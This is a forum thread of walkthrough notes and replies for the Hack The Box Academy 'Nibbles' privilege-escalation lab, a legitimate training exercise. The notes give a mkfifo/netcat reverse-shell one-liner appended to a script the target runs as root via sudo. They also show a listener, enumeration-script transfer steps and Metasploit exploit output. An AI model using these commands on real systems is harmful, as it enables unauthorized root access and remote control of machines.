Getting Started: Nibbles - Privilege Escalation PART 2 (Walk-through + Questions)

HTB Content Academy
1

Hello.

Just wanted to post my notes regarding the ‘Escalate privileges and submit the root.txt flag’ question within the Getting Started: Nibbles - Privilege Escalation PART 2 Hack the Box Module.

I ran into trouble with the reverse shell appendage to the monitor.sh file; so I hope this guide provides some relief to potential troubleshooters.

Also, I also hope people discuss answers to both of my questions at the end of my exercise notes.

Thank you for your time.

---------------------------------- BEGIN EXERCISE NOTES + QUESTIONS: -----------------------------------------
Exercise notes:
Escalate privileges and submit the root.txt flag.
*** Note: Must get reverse web-shell access from previous exercise ****

unzip personal.zip
wget <web address to bourne shell script (.sh) (home terminal)

hostname -I

sudo python3 -m http.server 8080 (on home terminal)
wget http://< home ip >:8080/LinEnum.sh (on target terminal)

  • Get 200 confirmation

chmod +x LinEnum.sh
./LinEnum.sh

  • Note: Chill for 2 minutes.
  • Note: The information regarding sudo commands without passwords exists in the ‘[-] Super user account(s):’ section of the response.

cd /home/nibbler/personal/stuff
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc < Home IP > 8443 >/tmp/f’ | tee -a monitor.sh

[CNTRL] + [Z] (In original home terminal (still running sudo python3 -m http.server 8080))
sudo nc -lnvp 8443 (home terminal)
sudo /home/nibbler/personal/stuff/monitor.sh (target terminal)

  • id
  • python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
  • cd ~
    - cat root.txt

Question(s):
Does the link to the LinEnum bource shell script < https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh > include the repo?

The reverse shell in monitor.sh did not seem to work without the port number 8443. Is there a reason the reverse shell does not work (at least for me) without port 8443?

2

Hey @Jordan_HTB

Env: Kali Linux working with OpenVpn file given

Great help here! I am struggling with getting a 200 response after running

python server on home terminal

I go back to target machine (inside bash)

enter: wget http://(local IP):8080/LinEnum.sh

When I run this command, Python server returns a 404 error, message File not found

Am I doing something wrong here?

Any assistance would be great help :smiley:

3

Update @Jordan_HTB

I managed to get 200 response. Not sure why, I ran python server withing the LinEnum.sh directory this time, is that where I was going wrong before? Not having the server run from there?

4

Glad you got the 200 response!
To be sure, I am unsure of the reason behind the spontaneous 200 response.
I could test your theory of the python server running from the LinEnum.sh directory; though I have a feeling your note may help someone down the line without an immediate test!

5

How do I do a manual cleanup of image.php?

msf6 exploit(multi/http/nibbleblog_file_upload) > run

[] Started reverse TCP handler on 172.30.249.74:4444
[!] This exploit may require manual cleanup of ‘image.php’ on the target
[] Exploit completed, but no session was created.

6

Remember that you are transferring the linenum.sh from your local to the target so sometimes target do not have wget installed so try curl

curl http://x.x.x.x:xxxx/linenum.sh -o linenum.sh
7

Try using your tun0 ip address. It works for me.